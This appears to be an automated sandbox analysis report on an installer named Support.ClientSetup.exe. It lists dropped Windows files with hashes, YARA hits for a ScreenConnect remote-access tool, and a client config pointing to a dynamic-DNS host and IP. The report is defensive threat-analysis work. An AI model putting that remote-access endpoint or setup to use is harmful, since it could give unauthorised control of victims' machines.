                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.8151583891155803
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:g8Ph6uRc06WXzInT5FBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDN:Ph61tnTkXpgffvdArNgfEgWB6QD
                                                                                                                                        MD5:07D29C1947FF3E2DD7D61BF4797CFC62
                                                                                                                                        SHA1:C4CDEA356ECA999578B01A911F0A1953D7C63ADD
                                                                                                                                        SHA-256:7E4ECEA6A6394B421194CCE966FAB700B7DC56C446C4CEF9847FB67FD68C19B4
                                                                                                                                        SHA-512:21676B7630C019A058383B9F8D1E6337D88229BB9D5943704FC375CBA3EF02203C5EEBDE6CBCE7E0427D9ED1E42FB2BFB06F58E99375794693701591C8B398CF
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Installer\{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}\DefaultIcon

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):435
                                                                                                                                        Entropy (8bit):5.289734780210945
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                                                                        MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                                                        SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                                                        SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                                                        SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):403156
                                                                                                                                        Entropy (8bit):5.359653712154593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauJ:zTtbmkExhMJCIpEgjxQsuk
                                                                                                                                        MD5:F90A934C20177876F8EAFF0513965ACC
                                                                                                                                        SHA1:18F78242CB261F8DFEB3CD2ECB8690C704DBF53D
                                                                                                                                        SHA-256:FC8E1D079CCC890C8C14A5FD53F24D87B87ECF630E5B1C0AFA2100484D4E2F2E
                                                                                                                                        SHA-512:F3022F74896B3E6321B6F8B1FA6EA3EDA44F77E7D9C29308EA654D1DDA0AA4E2538889663F86222EEEFF700FE6D6028EA4183371326C8BEC70C24ACFEA6C5B35
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:JSON data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):55
                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):2464
                                                                                                                                        Entropy (8bit):3.2430149748564747
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:QOaqdmuF3rl2V+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVN:FaqdF7YV+AAHdKoqKFxcxkF+P
                                                                                                                                        MD5:0E5B2ABC490009678927FF54EC7381E5
                                                                                                                                        SHA1:0AC53C2521E9CF8E5B3D4E07907BDA852101A201
                                                                                                                                        SHA-256:BEC608349C68513EE8001C089DD1DF797C2AB64CCAFAEB8B0F49D14B29A00B25
                                                                                                                                        SHA-512:B8A278549742ABA1B322293699B66B9C453386179CCB066E1B47705D8230EEFE6DAC4E43C31D0BF1C29B34C9190BB9813021964B4D9E6737E64F52940699E30D
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. D.e.c. .. 0.4. .. 2.0.2.4. .1.4.:.0.6.:.5.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                                                        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)\k5npgvlj.newcfg

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):559
                                                                                                                                        Entropy (8bit):5.034446775033166
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOUdkQkRLa/vXbAa3xT:2dL9hK6E46YPrQjvH
                                                                                                                                        MD5:6260C462A02FAF6DC7F67AB035FCC56C
                                                                                                                                        SHA1:B3C6CBC7F5FD4056DE464BFDEB93CDEF50E5560F
                                                                                                                                        SHA-256:85C99094D71919023467E5FB3CE56F8D5E31320957CA92EA612BF12059D051D5
                                                                                                                                        SHA-512:D8D91A9F660B6EF2D7911ED4B23EA0EB4A02836EFE883EAB1D55399A3E01F7762465A055E7DD96CAB83D25FC53F1EED0E8DA846D2DBF070E45AE6D91B591C355
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>fmt2as.ddns.net=194.59.31.27-04%2f12%2f2024%2019%3a05%3a36</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)\user.config (copy)

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):559
                                                                                                                                        Entropy (8bit):5.034446775033166
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOUdkQkRLa/vXbAa3xT:2dL9hK6E46YPrQjvH
                                                                                                                                        MD5:6260C462A02FAF6DC7F67AB035FCC56C
                                                                                                                                        SHA1:B3C6CBC7F5FD4056DE464BFDEB93CDEF50E5560F
                                                                                                                                        SHA-256:85C99094D71919023467E5FB3CE56F8D5E31320957CA92EA612BF12059D051D5
                                                                                                                                        SHA-512:D8D91A9F660B6EF2D7911ED4B23EA0EB4A02836EFE883EAB1D55399A3E01F7762465A055E7DD96CAB83D25FC53F1EED0E8DA846D2DBF070E45AE6D91B591C355
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>fmt2as.ddns.net=194.59.31.27-04%2f12%2f2024%2019%3a05%3a36</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                        C:\Windows\Temp\~DF202A26B4709F8A07.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DF22578DDE847BC16D.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.8151583891155803
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:g8Ph6uRc06WXzInT5FBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDN:Ph61tnTkXpgffvdArNgfEgWB6QD
                                                                                                                                        MD5:07D29C1947FF3E2DD7D61BF4797CFC62
                                                                                                                                        SHA1:C4CDEA356ECA999578B01A911F0A1953D7C63ADD
                                                                                                                                        SHA-256:7E4ECEA6A6394B421194CCE966FAB700B7DC56C446C4CEF9847FB67FD68C19B4
                                                                                                                                        SHA-512:21676B7630C019A058383B9F8D1E6337D88229BB9D5943704FC375CBA3EF02203C5EEBDE6CBCE7E0427D9ED1E42FB2BFB06F58E99375794693701591C8B398CF
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF22578DDE847BC16D.TMP, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DF408CB77A471410F3.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DF41028A737A73B478.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DF541DFE2B6D389D3F.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):69632
                                                                                                                                        Entropy (8bit):0.24033698600609024
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:PDhNNJDBAduHFS3qcq56AduHFSif+YdAL3NgnEsEd+/WZSrD1mX:PDZFxpgffvdArNgfEgWK
                                                                                                                                        MD5:E2B21C53C709D91D369658A89322BAEE
                                                                                                                                        SHA1:D51683832B0FAD0CDC0551457E7D13B4CF7608E1
                                                                                                                                        SHA-256:C8DF37900E906DDA3D64BEF7626CF37398A540D015C17BDA1E481F575D9CC2B7
                                                                                                                                        SHA-512:BB049F31AE50FA36D434DB48312F237176A491F2AA782F8AE63BC24905302E873518EE99E553F38AF0B67EF22383D52E70A1E0CF51177A4E59C619C00DD5D0B0
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF541DFE2B6D389D3F.TMP, Author: Joe Security
                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DF5EA8DB2B84680E0B.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):1.431374962432589
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:ApSucvh8FXzvT5aUNBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDqW:ASERToLXpgffvdArNgfEgWB6QD
                                                                                                                                        MD5:5D176C12CB093D1BF60DBFAE9CDF480C
                                                                                                                                        SHA1:A4C3A7146BA46820DB083F873CA3A816E3C7EE13
                                                                                                                                        SHA-256:28DDF3DB0729C06FCD71C4174C0EEC28B5F12970CC262C7BCD530477B0190643
                                                                                                                                        SHA-512:B54B7C9A52332ED8AB11021D9EEE78B779AAD3FDA8B4314224811665055C955AD0FFFCE2AB9AB329E1DB7C0B4C58BE0A7F89B4B2F27C0B74BCAA1BFE0E720B48
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF5EA8DB2B84680E0B.TMP, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DF97FD4A0028A9EAFA.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.8151583891155803
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:g8Ph6uRc06WXzInT5FBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDN:Ph61tnTkXpgffvdArNgfEgWB6QD
                                                                                                                                        MD5:07D29C1947FF3E2DD7D61BF4797CFC62
                                                                                                                                        SHA1:C4CDEA356ECA999578B01A911F0A1953D7C63ADD
                                                                                                                                        SHA-256:7E4ECEA6A6394B421194CCE966FAB700B7DC56C446C4CEF9847FB67FD68C19B4
                                                                                                                                        SHA-512:21676B7630C019A058383B9F8D1E6337D88229BB9D5943704FC375CBA3EF02203C5EEBDE6CBCE7E0427D9ED1E42FB2BFB06F58E99375794693701591C8B398CF
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF97FD4A0028A9EAFA.TMP, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DFA5A032AE8646FEEE.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):0.07757015492825638
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOXKrjfMRXVSKChiVky6l51:2F0i8n0itFzDHFXKrTMRXw7r
                                                                                                                                        MD5:294E31DF28DF3EA2FE223FA66B001163
                                                                                                                                        SHA1:207A3C465F58430B3DAB732C26D86658A7742129
                                                                                                                                        SHA-256:3FE1479149FF7065E92C0DDFF65A0067C3328247381590201535C6793CBE89B1
                                                                                                                                        SHA-512:BF5C0E50A3B5F594EA86F65DDB501D36A915D4A91A8C31AC57CBDB55D67CF3B1242275B0F5D9A2160B6546D6C610C1378FF457F10A3FAB97C33A5F1B08F92B7D
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DFB36FFE6B04D3445D.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):1.431374962432589
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:ApSucvh8FXzvT5aUNBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDqW:ASERToLXpgffvdArNgfEgWB6QD
                                                                                                                                        MD5:5D176C12CB093D1BF60DBFAE9CDF480C
                                                                                                                                        SHA1:A4C3A7146BA46820DB083F873CA3A816E3C7EE13
                                                                                                                                        SHA-256:28DDF3DB0729C06FCD71C4174C0EEC28B5F12970CC262C7BCD530477B0190643
                                                                                                                                        SHA-512:B54B7C9A52332ED8AB11021D9EEE78B779AAD3FDA8B4314224811665055C955AD0FFFCE2AB9AB329E1DB7C0B4C58BE0A7F89B4B2F27C0B74BCAA1BFE0E720B48
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFB36FFE6B04D3445D.TMP, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DFC3B0CE902C0E704E.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DFD73F95F8E305E1F6.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):1.431374962432589
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:ApSucvh8FXzvT5aUNBmxiqcq56AduHFSif+YdAL3NgnEsEd+/WZSrWAduHFSIDqW:ASERToLXpgffvdArNgfEgWB6QD
                                                                                                                                        MD5:5D176C12CB093D1BF60DBFAE9CDF480C
                                                                                                                                        SHA1:A4C3A7146BA46820DB083F873CA3A816E3C7EE13
                                                                                                                                        SHA-256:28DDF3DB0729C06FCD71C4174C0EEC28B5F12970CC262C7BCD530477B0190643
                                                                                                                                        SHA-512:B54B7C9A52332ED8AB11021D9EEE78B779AAD3FDA8B4314224811665055C955AD0FFFCE2AB9AB329E1DB7C0B4C58BE0A7F89B4B2F27C0B74BCAA1BFE0E720B48
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD73F95F8E305E1F6.TMP, Author: Joe Security
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Temp\~DFFFFB335F586FC1BD.TMP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):512
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3::
                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Entropy (8bit):7.429446792949428
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:Support.ClientSetup.exe
                                                                                                                                        File size:5'622'816 bytes
                                                                                                                                        MD5:6b40938a0c9723db144782829b133286
                                                                                                                                        SHA1:4e4e55175aa824d118f6cb20d6883a9c1d4d2a39
                                                                                                                                        SHA256:f6f1bd1f20dc68a6adce415ddb8cc509cd4e1f5435e369467abdd70900000cc3
                                                                                                                                        SHA512:7f52fb59b3d13f057b565e1a6e606f18849b8e0a7e58b03a49408dbbc3c2834c24c48e70061bb52aba93e0d93207f6d1ef5b5c763b488d42540298904700b709
                                                                                                                                        SSDEEP:49152:LEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:kEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                                                                        TLSH:4446E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........

                                                                                                                                        File Icon

